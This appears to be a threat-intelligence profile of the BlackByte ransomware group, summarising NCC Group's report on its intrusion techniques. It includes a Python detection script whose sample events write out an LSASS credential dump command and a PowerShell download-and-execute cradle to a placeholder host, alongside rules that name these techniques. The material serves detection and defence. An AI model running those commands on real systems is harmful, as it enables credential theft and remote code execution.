BlackByte
BlackByte is a ransomware threat actor/group. The reporting summarized here associates it with a ransomware sample recovered during an NCC Group incident response engagement. NCC Group assessed with medium confidence that the ransomware deployed in that intrusion, which identified itself in its ransom note as the "Everest group", was related to BlackByte, and attributed the analyzed sample to BlackByte as a C# variant rather than a Go variant. NCC Group stated it could not confirm whether another actor had copied BlackByte source code or whether BlackByte had resumed use of the C# variant.

In the observed intrusion, the actor used compromised legitimate accounts and Remote Desktop Protocol (RDP) for lateral movement. Credential access included dumping LSASS with ProcDump and collecting the Active Directory NTDS database, which was archived as ntds.dit.zip. Discovery included network scanning with netscan.exe, netscanpack.exe, and SoftPerfectNetworkScannerPortable.exe, with outputs saved under C:\Users\Public\Downloads.

Cobalt Strike was the primary command-and-control mechanism, executed via PowerShell using a download-and-execute pattern; a Metasploit payload was also identified. The actor additionally deployed AnyDesk, Splashtop Remote Desktop, and Atera as secondary remote access tools and persistence mechanisms, installed as Windows services. Data was archived with WinRAR and exfiltrated using Splashtop's file transfer capability. The operation was consistent with double extortion, involving both data exfiltration and encryption. The actor also routinely deleted tooling, reconnaissance outputs, and collected archives from hosts to evade detection.

Known alias: black_byte. The reporting also notes a possible relationship between Everest ransomware and BlackByte, but only with medium confidence.
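One way to hunt for the host artifacts named above (ProcDump against LSASS, the ntds.dit.zip archive, the named scanners and their output under C:\Users\Public\Downloads, the PowerShell download-and-execute cradle, and the remote access tools installed as services) in endpoint telemetry. This is an added example, not code from the NCC Group report or from Mallory; it assumes Sysmon-style process-creation, file-creation and service-installation events flattened to key=value lines, and every sample event, path, service name and URL below is constructed.

```python
import re

# Constructed sample events (not from the page or any real host), flattened to
# key=value lines in the style of Sysmon process creation (EID 1), file creation
# (EID 11) and Windows service installation (EID 7045). The URL is a placeholder.
SAMPLE_EVENTS = [
    "EID=1 Image=C:\\Temp\\procdump64.exe CommandLine=procdump64.exe -ma lsass.exe C:\\Temp\\lsass.dmp",
    "EID=11 Image=C:\\Windows\\System32\\cmd.exe TargetFilename=C:\\Users\\Public\\Downloads\\ntds.dit.zip",
    "EID=1 Image=C:\\Temp\\netscan.exe CommandLine=netscan.exe",
    "EID=11 Image=C:\\Temp\\netscan.exe TargetFilename=C:\\Users\\Public\\Downloads\\scan.xml",
    "EID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://c2.placeholder.invalid/x')",
    "EID=7045 ServiceName=Splashtop Remote Service ImagePath=C:\\Program Files (x86)\\Splashtop\\Splashtop Remote\\Server\\SRService.exe",
    "EID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe notes.txt",
]

SCANNERS = {"netscan.exe", "netscanpack.exe", "softperfectnetworkscannerportable.exe"}
REMOTE_TOOLS = ("anydesk", "splashtop", "atera")
PUBLIC_DL = "c:\\users\\public\\downloads\\"

def parse_event(line):
    """Split 'K=V K=V ...' into a dict; values may contain spaces but not ' Key='."""
    return dict(kv.split("=", 1) for kv in re.split(r" (?=\w+=)", line))

def field(e, key): return e.get(key, "").lower()          # missing field -> ""
def basename(path): return path.rsplit("\\", 1)[-1]        # last path component

# Each rule is (name, predicate over a parsed event); several rules may fire on one event.
RULES = [
    ("lsass_dump_procdump", lambda e: e["EID"] == "1"
        and basename(field(e, "Image")).startswith("procdump") and "lsass" in field(e, "CommandLine")),
    ("ntds_archive_created", lambda e: e["EID"] == "11"
        and basename(field(e, "TargetFilename")) == "ntds.dit.zip"),
    ("network_scanner_run", lambda e: e["EID"] == "1" and basename(field(e, "Image")) in SCANNERS),
    ("public_downloads_staging", lambda e: e["EID"] == "11"
        and field(e, "TargetFilename").startswith(PUBLIC_DL)),
    ("powershell_download_cradle", lambda e: e["EID"] == "1"
        and basename(field(e, "Image")) == "powershell.exe"
        and "downloadstring" in field(e, "CommandLine") and "iex" in field(e, "CommandLine")),
    ("remote_tool_service_install", lambda e: e["EID"] == "7045"
        and any(t in field(e, "ServiceName") + field(e, "ImagePath") for t in REMOTE_TOOLS)),
]

def scan(lines):
    """Return (rule_name, raw_line) for every rule that fires on every event, in input order."""
    hits = []
    for line in lines:
        event = parse_event(line)
        hits.extend((name, line) for name, pred in RULES if pred(event))
    return hits
```

Run `scan(SAMPLE_EVENTS)` to see each matching rule paired with the event that triggered it; the benign notepad event produces no hit.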
Associated malware families
2 malware families attributed to this actor across reporting.
Recent activity
1 source tracked across advisories, community write-ups, and news.